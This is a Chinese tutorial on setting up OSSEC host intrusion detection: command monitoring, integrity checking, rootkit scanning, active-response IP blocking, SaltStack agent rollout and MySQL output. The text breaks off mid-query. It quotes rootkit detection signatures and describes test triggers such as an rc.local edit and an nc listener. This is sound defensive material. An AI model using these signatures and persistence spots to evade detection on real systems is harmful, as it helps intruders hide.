0x01 概述


关于HIDS,并不是一个新鲜的话题,规模较大的企业都会选择自研,而如果你刚刚接手一个公司的网络安全,人手相对不足,那么OSSEC能帮助你安全建设初期快速搭建一套安全系统,后期如果遇到瓶颈也可以考虑自研去解决一些问题。

 

0x02 主要功能介绍


OSSEC的主要功能包括日志分析、文件完整性检测、Rootkit检测以及联动配置,另外你也可以将自己的其他监控项集成到OSSEC中。

1)日志监控

日志是平常安全运维中很重要的一项,OSSEC日志检测为实时检测,OSSEC的客户端本身没有解码文件和规则,所监控的日志会通过1514端口发送到服务端。

配置项可以在配置在每个agent的ossec.conf中或者在agent.conf中,需要写在 <localfile>中,可配置项如下:

location

指定日志的位置,strftime格式可以用于日志文件名,例如,一个名为file.log-2011-01-22的日志文件可以写为file.log-%Y-%m-%d。通配符可以用于非windows系统。当使用通配符时,日志文件必须在ossec-logcollector启动时存在。它不会自动开始监视新的日志文件。strftime和通配符不能在同一条目上使用。

log_format

例如syslog、command、full_command等等

需要注意的是command和full_command不能配置在agent.conf中,需要配置在ossec.conf中

command

执行的命令。如果log_format指定的是command,那么将逐行读取。如果log_format指定的是full_command,将全部匹配。

alias

该命令的别名。这将替换日志消息中的命令。

例如配置<alias>usb-check</alias>

ossec: output: ‘reg QUERY HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR’:

将被替换为

ossec: output: ‘usb-check’:

frequency

命令运行之间的最小时间间隔。时间间隔可能会比该值大,适用于log_format为command、full_command。

check_diff

事件的输出将存储在一个内部数据库中。每次接收到相同的事件时,输出都会与之前的输出相比较。如果输出发生了变化,将生成一个警告。

 

命令监控的具体事例:

默认的ossec.conf中自带的配置检查硬盘空间:

  <localfile>

    <log_format>command</log_format>

    <command>df -P</command>

  </localfile>

所对应的rule在ossec_rules.xml

  <rule id="531" level="7" ignore="7200">

    <if_sid>530</if_sid>

    <match>ossec: output: 'df -P': /dev/</match>

    <regex>100%</regex>

    <description>Partition usage reached 100% (disk space monitor).</description>

    <group>low_diskspace,</group>

  </rule>

默认的ossec.conf中自带的配置新增端口监听:

  <localfile>

    <log_format>full_command</log_format>

    <command>netstat -tan |grep LISTEN |egrep -v '(127.0.0.1| ::1)' | sort</command>

  </localfile>

所对应的rule在ossec_rules.xml

  <rule id="533" level="7">

    <if_sid>530</if_sid>

    <match>ossec: output: 'netstat -tan</match>

    <check_diff />

    <description>Listened ports status (netstat) changed (new port opened or closed).</description>

  </rule>

执行的结果保存在queue/diff/下,每次执行会进行比对

[root@localhost ossec]# cat queue/diff/192.168.192.196/533/last-entry

ossec: output: 'netstat -tan |grep LISTEN |egrep -v '(127.0.0.1| \\1)' | sort':

tcp        0      0 0.0.0.0:111                 0.0.0.0:*                   LISTEN     

tcp        0      0 0.0.0.0:22                  0.0.0.0:*                   LISTEN     

tcp        0      0 0.0.0.0:37498               0.0.0.0:*                   LISTEN     

tcp        0      0 :::111                      :::*                        LISTEN     

tcp        0      0 :::22                       :::*                        LISTEN     

tcp        0      0 :::62229                    :::*                        LISTEN

这里测试一下用nc监听2345端口,告警如下:

** Alert 1499397975.7591: mail  - ossec,

2017 Jul 07 11:26:15 (192.168.192.196) any->netstat -tan |grep LISTEN |egrep -v '(127.0.0.1| \\1)' | sort

Rule: 533 (level 7) -> 'Listened ports status (netstat) changed (new port opened or closed).'

ossec: output: 'netstat -tan |grep LISTEN |egrep -v '(127.0.0.1| \\1)' | sort':

tcp        0      0 0.0.0.0:111                 0.0.0.0:*                   LISTEN     

tcp        0      0 0.0.0.0:22                  0.0.0.0:*                   LISTEN     

tcp        0      0 0.0.0.0:2345                0.0.0.0:*                   LISTEN     

tcp        0      0 0.0.0.0:37498               0.0.0.0:*                   LISTEN     

tcp        0      0 :::111                      :::*                        LISTEN     

tcp        0      0 :::22                       :::*                        LISTEN     

tcp        0      0 :::62229                    :::*                        LISTEN     

Previous output:

ossec: output: 'netstat -tan |grep LISTEN |egrep -v '(127.0.0.1| \\1)' | sort':

tcp        0      0 0.0.0.0:111                 0.0.0.0:*                   LISTEN     

tcp        0      0 0.0.0.0:22                  0.0.0.0:*                   LISTEN     

tcp        0      0 0.0.0.0:37498               0.0.0.0:*                   LISTEN     

tcp        0      0 :::111                      :::*                        LISTEN     

tcp        0      0 :::22                       :::*                        LISTEN     

tcp        0      0 :::62229                    :::*                        LISTEN

之前在《Linux应急响应姿势浅谈》中提到的,Linux下开机启动项是应急响应中很重要的检测项,Redhat中的运行模式2、3、5都把/etc/rc.d/rc.local做为初始化脚本中的最后一个。这里我在agent的ossec.conf中新加一个监控,检测当rc.local发生改变的时候告警。

  <localfile>

    <log_format>full_command</log_format>

    <command>/bin/cat /etc/rc.local</command>

    <frequency>10</frequency>

  </localfile>

在Server端的/var/ossec/rules/ossec_rules.xml下新增一条规则

  <rule id="536" level="7">

      <if_sid>530</if_sid>

      <match>ossec: output: '/bin/cat</match>

      <check_diff />     

      <description>rclocal changed</description>

  </rule>

然后重启Server和Agent

Agent执行echo “echo test” >> /etc/rc.local

报警如下:

** Alert 1499399596.13605: mail  - ossec,

2017 Jul 07 11:53:16 (192.168.192.196) any->/bin/cat /etc/rc.local

Rule: 536 (level 7) -> 'rclocal changed'

ossec: output: '/bin/cat /etc/rc.local':

#!/bin/sh

#

# This script will be executed *after* all the other init scripts.

# You can put your own initialization stuff in here if you don't

# want to do the full Sys V style init stuff.

touch /var/lock/subsys/local

echo test

Previous output:

ossec: output: '/bin/cat /etc/rc.local':

#!/bin/sh

#

# This script will be executed *after* all the other init scripts.

# You can put your own initialization stuff in here if you don't

# want to do the full Sys V style init stuff.

touch /var/lock/subsys/local

 

2完整性检测

命令替换在应急响应中很常见,经常被替换掉的命令例如ps、netstat、ss、lsof等等。另外还有SSH后门。完整性检测的工作方式是Agent周期性的扫描系统文件,并将检验和发送给Server端。Server端存储并进行比对,发现修改是发出告警。

数据存放到服务端的/var/ossec/queue/syscheck目录下

[root@localhost syscheck]# ll /var/ossec/queue/syscheck

total 1388

-rw-r----- 1 ossec ossec 469554 Jun 29 03:16 (192.168.192.195) 192.168.192.195->syscheck

-rw-r----- 1 ossec ossec 469554 Jun 29 03:49 (192.168.192.196) 192.168.192.196->syscheck

-rw-r----- 1 ossec ossec 470797 Jun 29 18:13 syscheck

常用的配置如下:

<directories>

默认值是/etc,/usr/bin,/usr/sbin,/bin,/sbin,/boot

属性配置如下

realtime:实时监控

report_changes:报告文件变化,文件类型只能是文本

check_all:check_*全部为yes

check_sum:监测MD5和SHA1 HASH的变化,相当于设置check_sha1sum=”yes”和check_md5sum=”yes”

check_sha1sum:监测SHA1 HASH的变化

check_md5sum:监测MD5 HASH的变化

check_size:监测文件大小

check_owner:监测属主

check_group:监测属组

check_perm:监测文件权限

restrict:限制对包含该字符串的文件监测

 

<ignore>

配置忽略的文件和目录。所配置的文件和目录依然会检测,不过结果会忽略。

支持正则匹配<ignore type=”sregex”>.log$|.tmp</ignore>

<frequency>

检测周期

<scan_time>

开始扫描的时间,格式可以是21pm, 8:30, 12am

<scan_day>

配置一周中的哪天可以扫描,格式sunday, saturday, monday

<auto_ignore>

忽略变化超过3次的文件

<alert_new_files>

新文件创建时告警

<scan_on_start>

启动时扫描

<windows_registry>

Windows注册表项监控

<registry_ignore>

忽略的注册表项

<prefilter_cmd>

Prelink会修改二进制文件,以方便其快速启动,所以会导致二进制文件的MD5修改,导致误报。这个配置目的是忽略掉prelink产生的误报,配置<prefilter_cmd>/usr/sbin/prelink -y</prefilter_cmd>需要注意的是改配置会影响性能。

<skip_nfs>

跳过CIFS和NFS挂载目录

 

配置示例:

<syscheck>

    <directories check_all="yes">/etc,/usr/bin,/usr/sbin</directories>

    <directories check_all="yes">/root/users.txt,/bsd,/root/db.html</directories>

</syscheck>

修改告警级别,例如当/var/www/htdocs修改时,告警级别修改为12

<rule id="100345" level="12">

    <if_matched_group>syscheck</if_matched_group>

    <match>/var/www/htdocs</match>

    <description>Changes to /var/www/htdocs - Critical file!</description>

</rule>

这里有一个需要注意的地方,我一开始使用OSSEC的时候,用的默认配置,然后凌晨3点的时候收到了大量的告警,如下:

** Alert 1500341372.94081: mail - ossec,syscheck,

2017 Jul 18 09:29:32 localhost->syscheck

Rule: 550 (level 7) -> 'Integrity checksum changed.'

Integrity checksum changed for: '/sbin/partprobe'

Old md5sum was: 'cabd9d003c9f3b194b32eff8d27e9dfc'

New md5sum is : '34a3700736e54368e296c24acef6f5b9'

Old sha1sum was: '0eb531a5bce4fdf30da3d69aed181b54b4870f0b'

New sha1sum is : '19640bd6d1ebc4298423498a9363dfe2074023ad'



** Alert 1500341380.94500: mail - ossec,syscheck,

2017 Jul 18 09:29:40 localhost->syscheck

Rule: 550 (level 7) -> 'Integrity checksum changed.'

Integrity checksum changed for: '/sbin/wipefs'

Old md5sum was: '61ddf66c79323caff5d8254a29b526dc'

New md5sum is : '45af33cff81598dd0a33f0439c6aa68f'

Old sha1sum was: '161d409336291c8ed03a89bd8378739934dca387'

New sha1sum is : 'a735876ea2090323bd766cfb6bad0f57c6a900f2'

告警显示/sbin下的执行文件MD5都修改了。其实这里是因为定时任务Prelink导致。Prelink利用事先链接代替运行时链接的方法来加速共享库的加载,它不仅可以加快起动速度,还可以减少部分内存开销, 是各种Linux架构上用于减少程序加载时间、缩短系统启动时间和加快应用程序启动的很受欢迎的一个工具。

 

以CentOS6.5系统为例,

[root@sec248 cron.daily]# ls

logrotate  makewhatis.cron  mlocate.cron  prelink  readahead.cron  tmpwatch

prelink脚本内容如下:

#!/bin/sh



. /etc/sysconfig/prelink



renice +19 -p $$ >/dev/null 2>&1



if [ "$PRELINKING" != yes ]; then

  if [ -f /etc/prelink.cache ]; then

    echo /usr/sbin/prelink -uav > /var/log/prelink/prelink.log

    /usr/sbin/prelink -uav >> /var/log/prelink/prelink.log 2>&1 \

      || echo Prelink failed with return value $? >> /var/log/prelink/prelink.log

    rm -f /etc/prelink.cache

    # Restart init if needed

    [ -n "$(find `ldd /sbin/init | awk 'NF == 4 { print $3 }'` /sbin/init -ctime -1 2>/dev/null )" ] && /sbin/telinit u

  fi

  exit 0

fi



if [ ! -f /etc/prelink.cache -o -f /var/lib/prelink/force ] \

   || grep -q '^prelink-ELF0.[0-2]' /etc/prelink.cache; then

  # If cache does not exist or is from older prelink versions or

  # if we were asked to explicitely, force full prelinking

  rm -f /etc/prelink.cache /var/lib/prelink/force

  PRELINK_OPTS="$PRELINK_OPTS -f"

  date > /var/lib/prelink/full

  cp -a /var/lib/prelink/{full,quick}

elif [ -n "$PRELINK_FULL_TIME_INTERVAL" \

       -a "`find /var/lib/prelink/full -mtime -${PRELINK_FULL_TIME_INTERVAL} 2>/dev/null`" \

         = /var/lib/prelink/full ]; then

  # If no more than PRELINK_NONRPM_CHECK_INTERVAL days elapsed from last prelink

  # (be it full or quick) and no packages have been upgraded via rpm since then,

  # don't do anything.

  [ "`find /var/lib/prelink/quick -mtime -${PRELINK_NONRPM_CHECK_INTERVAL:-7} 2>/dev/null`" \

    -a -f /var/lib/rpm/Packages \

    -a /var/lib/rpm/Packages -ot /var/lib/prelink/quick ] && exit 0

  date > /var/lib/prelink/quick

  # If prelink without -q has been run in the last

  # PRELINK_FULL_TIME_INTERVAL days, just use quick mode

  PRELINK_OPTS="$PRELINK_OPTS -q"

else

  date > /var/lib/prelink/full

  cp -a /var/lib/prelink/{full,quick}

fi



echo /usr/sbin/prelink -av $PRELINK_OPTS > /var/log/prelink/prelink.log

/usr/sbin/prelink -av $PRELINK_OPTS >> /var/log/prelink/prelink.log 2>&1 \

  || echo Prelink failed with return value $? >> /var/log/prelink/prelink.log

# Restart init if needed

[ -n "$(find `ldd /sbin/init | awk 'NF == 4 { print $3 }'` /sbin/init -ctime -1 2>/dev/null )" ] && /sbin/telinit u



exit 0

 

/etc/sysconfig/prelink文件内容如下:

[root@localhost cron.daily]# cat /etc/sysconfig/prelink | grep -v '^$' | grep -v '^#'

PRELINKING=yes

PRELINK_OPTS=-mR

PRELINK_FULL_TIME_INTERVAL=14

PRELINK_NONRPM_CHECK_INTERVAL=7

通过看上面的脚本,我们明白每14天会进行一次正常Prelink操作,也就是执行

/usr/sbin/prelink -av -mR

平时每天执行的Prelink操作其实是quick模式,也就是执行

/usr/sbin/prelink -av -mR -q

 

解决方案是添加配置

<prefilter_cmd>/usr/sbin/prelink -y</prefilter_cmd>

在比对MD5或者SHA1之前,会先执行prelink -y <file>,从而避免误报。prelink -y <file>会输出prelink之前的原始文件内容。

 

过了一段时间,突然一台机器上收到大量告警,所监控二进制文件的SHA都变成了da39a3ee5e6b4b0d3255bfef95601890afd80709。

然后我查看了OSSEC服务端的记录信息/var/ossec/queue/syscheck,syscheck记录内容如下:

./(10.59.0.238) any->syscheck:+++0:0:0:0:xxx:da39a3ee5e6b4b0d3255bfef95601890afd80709 !1531341371 /usr/bin/jdb

./(10.59.0.238) any->syscheck:+++0:0:0:0:xxx:da39a3ee5e6b4b0d3255bfef95601890afd80709 !1531341375 /usr/bin/policytool

./(10.59.0.238) any->syscheck:+++0:0:0:0:xxx:da39a3ee5e6b4b0d3255bfef95601890afd80709 !1531341397 /usr/bin/jmap

./(10.59.0.238) any->syscheck:+++0:0:0:0:xxx:da39a3ee5e6b4b0d3255bfef95601890afd80709 !1531341405 /usr/bin/javah

./(10.59.0.238) any->syscheck:+++0:0:0:0:xxx:da39a3ee5e6b4b0d3255bfef95601890afd80709 !1531341436 /usr/bin/appletviewer

./(10.59.0.238) any->syscheck:+++0:0:0:0:xxx:da39a3ee5e6b4b0d3255bfef95601890afd80709 !1531341448 /usr/bin/javac

的确好多二进制文件的SHA值都变成了da39a3ee5e6b4b0d3255bfef95601890afd80709,其实这是空字符的SHA1值。我手工执行Prelink测试一下

[root@localhost cron.daily]# prelink -y /bin/sh

at least one of file's dependencies has changed since prelinking

看起来原因是自动最后一次Prelink操作后,有些依赖库修改了。既然是依赖库修改了,那么肯定是运维升级了什么东西导致的。

搜索了一下Bash记录,发现的确是运维升级了Java相关包。

解决方法就是执行一次normal Prelink操作,quick模式无法修复该问题。

/usr/sbin/prelink -av -mR

 

3)Rootkit检测

Rootkit也是平时应急响应比较头疼的,OSSEC的检测原理如下:

对比rootkit_files.txt,该文件中包含了rootkit常用的文件。就像病毒库一样。

[root@localhost shared]# egrep -v "^#" rootkit_files.txt | grep -v '^$' | head -n 3

tmp/mcliZokhb           ! Bash door ::/rootkits/bashdoor.php

tmp/mclzaKmfa           ! Bash door ::/rootkits/bashdoor.php

dev/.shit/red.tgz       ! Adore Worm ::/rootkits/adorew.php

如果是以”*”开头的话,会扫描整个系统。

对比rootkit_trojans.txt文件中二进制文件特征。

[root@localhost shared]# egrep -v "^#" rootkit_trojans.txt | grep -v '^$' | head -n 3

ls          !bash|^/bin/sh|dev/[^clu]|\.tmp/lsfile|duarawkz|/prof|/security|file\.h!

env         !bash|^/bin/sh|file\.h|proc\.h|/dev/|^/bin/.*sh!

echo        !bash|^/bin/sh|file\.h|proc\.h|/dev/[^cl]|^/bin/.*sh!

扫描整个文件系统,检测异常文件和异常的权限设置,文件属主是root,但是其他用户可写是非常危险的,rootkit将会扫描这些文件。同时还会检测具有suid权限的文件、隐藏的文件和目录。

另外还会检测隐藏端口、隐藏进程、/dev目录、网卡混杂模式等。

这里看一下ossec.conf中默认的rootcheck的配置

  <rootcheck>

    <rootkit_files>/var/ossec/etc/shared/rootkit_files.txt</rootkit_files>

    <rootkit_trojans>/var/ossec/etc/shared/rootkit_trojans.txt</rootkit_trojans>

    <system_audit>/var/ossec/etc/shared/system_audit_rcl.txt</system_audit>

    <system_audit>/var/ossec/etc/shared/cis_debian_linux_rcl.txt</system_audit>

    <system_audit>/var/ossec/etc/shared/cis_rhel_linux_rcl.txt</system_audit>

    <system_audit>/var/ossec/etc/shared/cis_rhel5_linux_rcl.txt</system_audit>

  </rootcheck>

/var/ossec/etc/shared/rootkit_files.txt文件中包含了rootkit常用的文件。

/var/ossec/etc/shared/rootkit_trojans.txt文件中检测一些二进制文件的特征。

后面主要是检测系统配置。

测试:

server:192.168.192.193

agent:192.168.192.196

根据上述检测原理第一条,我们在192.168.192.196下创建文件/tmp/mcliZokhb

然后在Server端执行

[root@localhost ossec]# ./bin/agent_control -r -u 1028

OSSEC HIDS agent_control: Restarting Syscheck/Rootcheck on agent: 1028

当扫描完成后,Syscheck last started和Rootcheck last started的时间会更新。

[root@localhost rootcheck]# /var/ossec/bin/agent_control -i 1028



OSSEC HIDS agent_control. Agent information:

   Agent ID:   1028

   Agent Name: 192.168.192.196

   IP address: any/0

   Status:     Active



   Operating system:    Linux localhost 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64

   Client version:      OSSEC HIDS v2.9.0 / 2d13fc898c1b864609180ad7f4512b4c

   Last keep alive:     Thu Jul 13 14:11:25 2017



   Syscheck last started  at: Thu Jul 13 14:05:27 2017

   Rootcheck last started at: Thu Jul 13 13:55:00 2017

来看一下/var/ossec/queue/rootcheck下的内容

[root@localhost rootcheck]# cat \(192.168.192.196\)\ any-\>rootcheck

!1499925300!1499150323 Starting rootcheck scan.

!1499925927!1499150951 Ending rootcheck scan.

!1499925300!1499925300 Rootkit 'Bash' detected by the presence of file '/tmp/mcliZokhb'.

其中扫描开始时间为1499925300(2017/7/13 13:55:0),扫描结束时间为1499925927(2017/7/13 14:5:27)

然后在1499925300(2017/7/13 13:55:0),检测到了Rootkit。

然后查看ALert日志中的告警信息

[root@localhost rootcheck]# cat /var/ossec/logs/alerts/alerts.log

** Alert 1499925300.0: mail  - ossec,rootcheck,

2017 Jul 13 13:55:00 (192.168.192.196) any->rootcheck

Rule: 510 (level 7) -> 'Host-based anomaly detection event (rootcheck).'

Rootkit 'Bash' detected by the presence of file '/tmp/mcliZokhb'.

PS:

1)部署后,发现经常会收到进程隐藏的告警,经排查服务器也不存在异常。

Process ‘25905’ hidden from /proc. Possible kernel level rootkit.

添加规则rules/ossec_rules.xml

  <rule id="517" level="0">

     <if_sid>510</if_sid>

     <match>hidden from /proc</match>

     <description>Ignored process hidden entries.</description>

     <group>rootcheck,</group>

  </rule>

屏蔽掉该告警。

2)因为OSSEC会检测属主是Root但是Other用户有w权限的文件,有些正常业务的文件会导致误报。

添加规则rules/ossec_rules.xml

  <rule id="520" level="0">

     <if_sid>510</if_sid>

     <match>/usr/local/fms</match>

     <description>Ignored some files which owned by root and has write permissions.</description>

     <group>rootcheck,</group>

  </rule>

屏蔽掉这些目录。

3)用户添加白名单

vim syslog_rules.xml

  <rule id="5905" level="0">
    <if_sid>5901</if_sid>
    <match>name=flume</match>
    <description>New group Ignore</description>
  </rule>

  <rule id="5906" level="0">
    <if_sid>5902</if_sid>
    <match>name=flume</match>
    <description>New user Ignore</description>
  </rule>

添加flume的白名单用户

 

4)联动配置

主动响应分为两部分,第一步需要配置需要执行的脚本,第二步需要绑定该脚本到具体的触发规则。/var/ossec/etc/ossec.conf中相应配置如下:

<ossec_config>

    <command>

        <!--

        Command options here

        -->

    </command>

    <active-response>

        <!--

        active-response options here

        -->

    </active-response>

</ossec_config>

Command配置参数如下:

name

对应active-response所使用的名称

executable

/var/ossec/active-response/bin中的可执行文件,不需要写全路径。

expect

命令执行的参数,选项可以是srcip和user(其他的名不接受). 如果expect标签内的值为空,那么传递-代替真实的值。如果一个响应脚本需要srcip,那么它必须在expect选项中。

如果不需要传递参数值,写<expect></expect>即可。

timeout_allowed

指定该命令是否支持超时。

 

active-response配置参数如下:

disabled

如果设置为yes,则禁用主动响应,默认为启用。

command

需要执行的脚本的名称,对应command标签中的name。

location

在哪里执行命令,具体参数如下:

local: 产生该事件的agent

server: 在server端

defined-agent: 指定一个agent,需要配置agent id

all: 所有agent

agent_id

需要执行脚本的agent的ID

level

大于等于该level的event将执行该响应

rules_group

响应将在已定义的组中的任何事件上执行。可以用逗号分隔多个组。

rules_id

响应将在任何带有已定义ID的事件上执行。可以用逗号分隔多个ID。

timeout

以封禁IP为例,指定IP封禁的时间(单位为秒)。

 

这里我们来测试一下:

Server:192.168.192.193

Client(ID:1029)192.168.192.195

Client(ID:1028) 192.168.192.196

首先看一下SSH登录失败的日志为:

Jul  6 15:15:57 localhost sshd[28590]: Failed password for root from 192.168.192.196 port 34108 ssh2

所对应的decode.xml中的解码规则为:

<decoder name="ssh-failed">

  <parent>sshd</parent>

  <prematch>^Failed \S+ </prematch>

  <regex offset="after_prematch">^for (\S+) from (\S+) port \d+ \w+$</regex>

  <order>user, srcip</order>

</decoder>

这里通过正则表达式获取到了user和srcip

所对应的Rule在sshd_rules.xml中,可以看到告警等级为5:

  <rule id="5716" level="5">

    <if_sid>5700</if_sid>

    <match>^Failed|^error: PAM: Authentication</match>

    <description>SSHD authentication failed.</description>

    <group>authentication_failed,</group>

  </rule>

查看ossec.conf,这里我们添加如下:

  <active-response>

    <command>test</command>

    <location>local</location>

    <level>5</level>

    <timeout>60</timeout>

  </active-response>

所对应的执行脚本名称为test,脚本为本地执行,当rule级别大于等于5时触发,封禁时间为60S。

所对应的command配置为

  <command>

    <name>test</name>

    <executable>test.sh</executable>

    <expect>srcip,user</expect>

    <timeout_allowed>yes</timeout_allowed>

  </command>

这里传递了两个参数srcip,user(前后顺序不影响)。所对应的是ssh-failed解码规则中取到的user和srcip。

/var/ossec/active-response/bin/test.sh文件内容为

#!/bin/sh

LOCAL=`dirname $0`;

cd $LOCAL

cd ../

PWD=`pwd`

echo "`date` $0 $1 $2 $3 $4 $5" >> ${PWD}/../logs/active-responses.log

脚本所传递的参数如下:

$1 动作 (delete or add)

$2 user (or – if not set)

$3 srcip (or – if not set)

$4 时间戳

$5 规则号

 

修改权限和属组

[root@localhost bin]# chown root:ossec test.sh

[root@localhost bin]# chmod 550 test.sh

 

然后在192.168.192.196使用错误密码登录192.168.192.193,触发规则,查看日志

[root@localhost ossec]# tail -f logs/active-responses.log

Thu Jul  6 17:07:02 CST 2017 /var/ossec/active-response/bin/test.sh add root 192.168.192.196 1499332022.14278 5503

Thu Jul  6 17:08:32 CST 2017 /var/ossec/active-response/bin/test.sh delete root 192.168.192.196 1499332022.14278 5503

然后我们再用OSSEC自带的host-deny脚本测试一下。

  <command>

    <name>host-deny</name>

    <executable>host-deny.sh</executable>

    <expect>srcip</expect>

    <timeout_allowed>yes</timeout_allowed>

  </command>

  <active-response>

    <command>host-deny</command>

    <location>local</location>

    <level>5</level>

    <timeout>30</timeout>

  </active-response>

这里<location>local</location>,即仅在触发该规则的Agent有效。

然后我使用另外一台机器192.168.192.120使用错误密码登录192.168.192.196

触发规则后查看hosts.deny发现已经添加了IP192.168.192.120

[root@localhost ossec]# cat /etc/hosts.deny  | grep 120

ALL:192.168.192.120

 

0x03 SaltStack批量部署Agent



在企业内部有各种运维工具有用批量管理服务器,例如SaltStack、ansible等。这里我以SaltStack为例。批量部署这里面临两个问题:

1)install.sh安装交互问题

OSSEC安装为交互式安装,需要手工输入Server端地址,是否开启一些模块等。解决办法是配置preloaded-vars.conf

[root@localhost ossec-hids-2.9.0]# cp etc/preloaded-vars.conf.example etc/preloaded-vars.conf

修改preloaded-vars.conf中的配置即可。最终配置如下:

[root@test135 etc]# cat preloaded-vars.conf | grep -v "^#" | grep -v "^$"

USER_LANGUAGE="cn"     # For english

USER_NO_STOP="y"

USER_INSTALL_TYPE="agent"

USER_DIR="/var/ossec"

USER_ENABLE_ACTIVE_RESPONSE="y"

USER_ENABLE_SYSCHECK="y"

USER_ENABLE_ROOTCHECK="y"

USER_AGENT_SERVER_IP="10.111.111.111"

2)Key认证问题

新版本的OSSEC中ossec-authd和agent-auth提供了自动化导入Key的功能。

ossec-authd:

os-authd守护进程运行在服务端,自动分发Key和添加Agent。

默认情况下,该过程中不存在任何身份验证或授权,因此建议只在添加新代理时运行该守护进程。

ossec-authd进程需要SSL keys才行运行。

如果没有SSL Keys会提示以下错误:

[root@localhost syscheck]# /var/ossec/bin/ossec-authd -p 1515

2017/07/04 14:02:26 ossec-authd: INFO: Started (pid: 12764).

2017/07/04 14:02:26 ossec-authd: ERROR: Unable to read certificate file (not found): /var/ossec/etc/sslmanager.cert

2017/07/04 14:02:26 ossec-authd: ERROR: SSL error. Exiting.

生成SSL Keys

[root@localhost syscheck]# openssl genrsa -out /var/ossec/etc/sslmanager.key 2048

Generating RSA private key, 2048 bit long modulus

.....+++

........+++

e is 65537 (0x10001)

[root@localhost syscheck]# openssl req -new -x509 -key /var/ossec/etc/sslmanager.key -out /var/ossec/etc/sslmanager.cert -days 365

You are about to be asked to enter information that will be incorporated

into your certificate request.

What you are about to enter is what is called a Distinguished Name or a DN.

There are quite a few fields but you can leave some blank

For some fields there will be a default value,

If you enter '.', the field will be left blank.

-----

Country Name (2 letter code) [XX]:

State or Province Name (full name) []:

Locality Name (eg, city) [Default City]:

Organization Name (eg, company) [Default Company Ltd]:

Organizational Unit Name (eg, section) []:

Common Name (eg, your name or your server's hostname) []:

Email Address []:

启动ossec-authd

[root@localhost syscheck]# /var/ossec/bin/ossec-authd

2017/07/04 14:11:35 ossec-authd: INFO: Started (pid: 12788).

[root@localhost syscheck]# netstat -anlp | grep 1515

tcp        0      0 :::1515                     :::*                        LISTEN      12788/ossec-authd

然后客户端运行,这里如果不指定-A为IP的话,默认是Hostname

[root@localhost src]# /var/ossec/bin/agent-auth -m 192.168.192.193 -p 1515 -A 192.168.192.196

2017/07/04 14:27:59 ossec-authd: INFO: Started (pid: 14137).

2017/07/04 14:27:59 INFO: Connected to 192.168.192.193 at address 192.168.192.193, port 1515

INFO: Connected to 192.168.192.193:1515

INFO: Using agent name as: 192.168.192.196

INFO: Send request to manager. Waiting for reply.

INFO: Received response with agent key

INFO: Valid key created. Finished.

INFO: Connection closed.

查看服务端:

2017/07/04 14:27:59 ossec-authd: INFO: New connection from 192.168.192.196

2017/07/04 14:27:59 ossec-authd: INFO: Received request for a new agent (192.168.192.196) from: 192.168.192.196

2017/07/04 14:27:59 ossec-authd: INFO: Agent key generated for 192.168.192.196 (requested by 192.168.192.196)

2017/07/04 14:27:59 ossec-authd: INFO: Agent key created for 192.168.192.196 (requested by 192.168.192.196)

重启客户端服务/var/ossec/bin/ossec-control restart

查看当前连接的Agents

[root@localhost alerts]# /var/ossec/bin/agent_control -lc



OSSEC HIDS agent_control. List of available agents:

   ID: 000, Name: localhost (server), IP: 127.0.0.1, Active/Local

   ID: 1028, Name: 192.168.192.196, IP: any, Active

启动Agent时的INFO信息

2017/12/13 09:32:18 ossec-agentd: INFO: Using notify time: 600 and max time to reconnect: 1800

可以看到keepalive的时间间隔为10Min,最大重连时间为30Min。

[root@sec248 etc]# /var/ossec/bin/agent_control -i 1024 | grep keep

Last keep alive:     Wed Dec 13 09:34:06 2017

可以查看agent的上次keepalive时间,超过最大重连时间,会有告警。

综合上述两个问题,最终Salt部署模板如下:

include:

  - mk_Downloads



install_packages:

  pkg.latest:

    - pkgs:

      - openssl-devel

      - gcc

      - prelink



install_ossec:

  cmd.run:

    - name: tar zxf ossec.tar.gz && cd ossec && sh install.sh

    - cwd: /root/Downloads

    - unless: test -e /var/ossec/bin/ossec-control

    - require:

      - file: /root/Downloads/ossec.tar.gz



/var/ossec/etc/ossec.conf:

  file.managed:

    - source: salt://ossec/conf/ossec.conf

    - user: root

    - group: root

    - mode: 644

    - template: jinja

    - require:

      - cmd: install_ossec



/var/ossec/etc/shared/agent.conf:

  file.managed:

    - source: salt://ossec/conf/agent.conf

    - user: root

    - group: root

    - mode: 644

    - template: jinja

    - require:

      - cmd: install_ossec



/var/ossec/monitor.sh:

  file.managed:

    - source: salt://ossec/conf/monitor.sh

    - user: root

    - group: root

    - mode: 755

    - template: jinja

    - require:

      - cmd: install_ossec



/root/Downloads/ossec.tar.gz:

  file.managed:

    - source: salt://ossec/ossec.tar.gz

    - user: root

    - group: root

    - mode: 755

    - template: jinja

    - require:

      - file: /root/Downloads



agentauth:

  cmd.run:

    - name: /var/ossec/bin/agent-auth -m 10.59.0.248 -p 1515 -A $(ifconfig | egrep -o '10\.(59|211|200).[0-9]{1,3}.[0-9]{1,3}' | head -n 1)

    - unless: test -s /var/ossec/etc/client.keys

    - require:

      - cmd: install_ossec



serverstart:

  cmd.run:

    - name: /var/ossec/bin/ossec-control restart

    - onchanges:

      - file: /var/ossec/etc/ossec.conf

    - require:

      - cmd: install_ossec

 

0x04 MySQLWebUI安装


Mysql安装:

在2.9之前可以使用make setdb后编译OSSEC来支持Mysql。默认的安装脚本install.sh是不支持Mysql的,所以需要在源码的src目录下执行

make TARGET=server DATABASE=mysql install

然后执行

/var/ossec/bin/ossec-control enable database

创建数据库和导入表结构

mysql> create database ossec;

Query OK, 1 row affected (0.00 sec)



mysql> grant INSERT,SELECT,UPDATE,CREATE,DELETE,EXECUTE on ossec.* to ossec@127.0.0.1;

Query OK, 0 rows affected (0.00 sec)



mysql> set password for ossec@127.0.0.1=PASSWORD('hehe123');

Query OK, 0 rows affected (0.00 sec)



mysql> flush privileges;

Query OK, 0 rows affected (0.00 sec)



mysql> quit



[root@localhost ossec]# mysql -u root -phehe123 -D ossec < /tmp/ossec-hids-2.9.0/src/os_dbd/mysql.schema

在ossec.conf中添加配置

    <database_output>

        <hostname>127.0.0.1</hostname>

        <username>ossec</username>

        <password>hehe123</password>

        <database>ossec</database>

        <type>mysql</type>

    </database_output>

然后重启服务。

/var/ossec/bin/ossec-dbd启动成功。

[root@localhost logs]# ps axu | grep dbd | grep -v grep

ossecm    3919  0.0  0.0  51172  2872 ?        S    10:00   0:00 /var/ossec/bin/ossec-dbd

尝试SSH登录失败,看一下入库信息。

mysql> select * from alert a join location l on a.location_id = l.id where l.id = 5\G

*************************** 1. row ***************************

         id: 9

  server_id: 1

    rule_id: 5503

